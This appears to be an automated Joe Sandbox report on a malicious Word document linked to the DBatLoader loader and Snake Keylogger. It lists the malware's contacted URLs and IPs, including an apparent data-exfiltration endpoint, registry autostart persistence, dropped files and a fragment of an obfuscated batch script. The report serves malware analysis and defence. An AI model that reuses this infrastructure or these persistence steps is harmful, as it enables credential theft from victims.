http://e6.i.lencr.org/0	npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928519346.00000000307A8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3865103101.0000000030778000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998676188.000000002B3D0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/lBsq	npratlsN.pif, 0000000D.00000002.3852283482.000000001CCE6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA66000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000285AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D999000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002847C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/Dz	npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D931000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D999000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028452000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/(	npratlsN.pif, 00000011.00000002.3850452895.00000000285A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enLz	npratlsN.pif, 0000000D.00000002.3852283482.000000001CCBA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA3A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/Lz	npratlsN.pif, 0000000D.00000002.3852283482.000000001CCEB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA6B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.1894	npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
46.151.208.21	mail.irco.com.sa	Saudi Arabia	51975	NASHIRNET-ASNNASHIRNETASNSA	true
166.62.27.188	amazonenviro.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
147.124.216.113	unknown	United States	1432	AC-AS-1US	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592497
Start date and time:	2025-01-16 08:24:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PI ITS15235 (2).doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@20/13@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 196 Number of non-executed functions: 84
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer Override analysis time to 79666.5206 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 52.109.32.39, 52.109.32.38, 52.109.32.47, 52.109.32.46, 104.46.162.225, 2.21.65.149, 2.21.65.130, 52.109.28.47, 40.126.31.69, 13.107.246.45, 20.109.210.53, 23.1.237.91
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, onedscolprdaus01.australiasoutheast.cloudapp.azure.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, e26769.dscb.akamaiedge
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:25:22	API Interceptor	2x Sleep call for process: brightness.exe modified
02:25:34	API Interceptor	5360788x Sleep call for process: npratlsN.pif modified
02:25:41	API Interceptor	2x Sleep call for process: Nsltarpn.PIF modified
08:25:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url
08:25:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
46.151.208.21	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SP0npSA64a.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	7DI4iYwcvw.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
166.62.27.188	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	amazonenviro.com/245_Aiymwhpjxsg
	UAHIzSm2x2.exe	Get hash	malicious	DBatLoader	Browse	amazonenviro.com/245_Aiymwhpjxsg
	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	amazonenviro.com/245_Aiymwhpjxsg
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	amazonenviro.com/245_Aiymwhpjxsg
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	amazonenviro.com/245_Aiymwhpjxsg
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	amazonenviro.com/245_Aiymwhpjxsg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
amazonenviro.com	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	JDQS879kiy.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	UAHIzSm2x2.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	LbZ88q4uPa.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
reallyfreegeoip.org	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	New PO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
api.telegram.org	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://shorten.so/fVj82	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	http://hrpibzdeam.xyz/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://tg.666986.xyz/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	Handler.exe	Get hash	malicious	DanaBot, PureLog Stealer, Vidar	Browse	149.154.167.99
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
AS-26496-GO-DADDY-COM-LLCUS	Subscription_Renewal_Receipt_2025.htm	Get hash	malicious	Unknown	Browse	68.178.204.95
	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	107.180.51.237
	NLWfV87ouS.dll	Get hash	malicious	Wannacry	Browse	72.167.90.1
	http://www.northamericaniron.com	Get hash	malicious	Unknown	Browse	50.63.8.11
	https://www.xrmtoolbox.com/	Get hash	malicious	Unknown	Browse	50.63.8.184
	mips.elf	Get hash	malicious	Unknown	Browse	68.178.237.155
	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	JDQS879kiy.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
	UAHIzSm2x2.exe	Get hash	malicious	DBatLoader	Browse	166.62.27.188
NASHIRNET-ASNNASHIRNETASNSA	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	SP0npSA64a.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	7DI4iYwcvw.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	46.151.208.21
	92.249.48.47-skid.x86-2024-07-20T09_04_17.elf	Get hash	malicious	Mirai, Moobot	Browse	185.79.251.94
	Request For Quotation - ( 11 APR 2022) exp. 15 APR 2022.pdf.exe	Get hash	malicious	FormBook	Browse	46.151.208.26
AC-AS-1US	sh4.elf	Get hash	malicious	Unknown	Browse	147.124.88.46
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	Di4bqyzGYS.exe	Get hash	malicious	Remcos, DarkTortilla	Browse	147.124.212.172
	zYj1wg0cM2.doc	Get hash	malicious	DBatLoader	Browse	147.124.216.113
	Payment Swift CopyMT103.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	147.124.212.172
	Customer.exe	Get hash	malicious	XWorm	Browse	147.124.210.158
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	147.124.216.113
	ppc.elf	Get hash	malicious	Unknown	Browse	147.124.39.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	New PO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	order6566546663.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	BNXCXCJSD.jse	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	NEWORDER.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://docusign6478.weebly.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://hrpibzdeam.xyz/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Drogerie-K%C3%B6rperpflege/b/?ie=UTF8&node=64187031&ref_=nav_cs_hpc	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://ciiscp.org/wordpress/mail.uu.se.html	Get hash	malicious	Outlook Phishing	Browse	149.154.167.220
	https://metawavetech-rho.vercel.app/gyQydv$g=JswGhjsY=LbngjTsm_Ln@v	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://solocyberuser.github.io/netflix/html/home.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://harshit-gupta-khatuji.github.io/khatuji_intern	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://imqtokjen.com/zh.html	Get hash	malicious	Unknown	Browse	149.154.167.220
a0e9f5d64349fb13191bc781f81f42e1	g6lWBM64S4.msi	Get hash	malicious	Unknown	Browse	166.62.27.188
	new-riii-1-b.pub.hta	Get hash	malicious	LummaC	Browse	166.62.27.188
	EZsrFTi.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	166.62.27.188
	lummm_lzmb.exe	Get hash	malicious	LummaC	Browse	166.62.27.188
	L#U043e#U0430d#U0435r.exe	Get hash	malicious	LummaC	Browse	166.62.27.188
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	166.62.27.188
	Adobe-Acrobat-Pro-2025.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	166.62.27.188
	MotivatedFunded.exe	Get hash	malicious	LummaC Stealer	Browse	166.62.27.188
	Set-Up.exe	Get hash	malicious	LummaC	Browse	166.62.27.188

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\npratlsN.pif	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8214
Entropy (8bit):	4.674238519900089
Encrypted:	false
SSDEEP:	192:xmRmcVw5I1Rsv869gx2A9gB59zox8Y2MXNlT3l:xmcIDsss3ffY2MXDJ
MD5:	7821E3DE3812E791CF3B223500D73BC9
SHA1:	5E211B634CE77E6FEE83CE8A5B8C9A37C8B81E1D
SHA-256:	3DAA7F9EEE129F61F7A452F7150EE21A1C4141586A37F37842B9C3BB53152A74
SHA-512:	6EAE270065401626DF97B73A255578BF27B4F4DEA480954843823046AD95E40CF706C1A767C8765EF3AB48EA3A18498375614317EC00A9EF29A4DD21EDBC5F26
Malicious:	false
Reputation:	low
Preview:	@echo off..set "kocp=sket "..@% . .......%e%..... ..%c% .%h%......%o%..r.o% %......%o%....o.... %f%r%f%.. .%..s%.%e%..%t%. ..% %.%"%..%X%.. %I%.......%n%.....%i%....... %=%.......%s%...%e%. .o.%t%.....% %.r..r....%"%.%..%XIni%"%... %s% ......%K%o.%x%..%H%......%=%.........o%=%. ...%"%...o..%..%XIni%"%..........%F%.r.. ... %J%.%I%.o%V%......%I%.%x%. %F%........%p%..........%s%....... .%T%r..%%sKxH%h%.o....o..%2%....r....r%s%.....%h%...o..%"% ... %..%XIni%"%. .%B%.........%m%.....%T%...o.%j%........%M%.%S%......

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Windows\SysWOW64\brightness.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
Category:	dropped
Size (bytes):	28538
Entropy (8bit):	4.650636495384082
Encrypted:	false
SSDEEP:	384:Y0iUTHG+EnI6DRfX67uezyCqIUEfDTfF3K0QNqTTwNv7lkqj3DRvCpoVsodnqgJW:YwWbDRfipu7IUkfYQ0Xkqjgww
MD5:	E24FA8FB365A89779B026772B9342AF3
SHA1:	B90DE3C9F3093CA8BADFAF6C98218B744087E8F9
SHA-256:	10D7B4EA056FC1037109FE6E6694849D145B0745FAA9AE02957104A2834A14A0
SHA-512:	A32F7A29C4C8CC831A5057B8DB31F79E7DEDB9172AC9705DA6A8DA65384ED23827C3CCCDB833562CDAB63ADDD679341707A2B46BBC8C802845CBBBBB01771D10
Malicious:	false
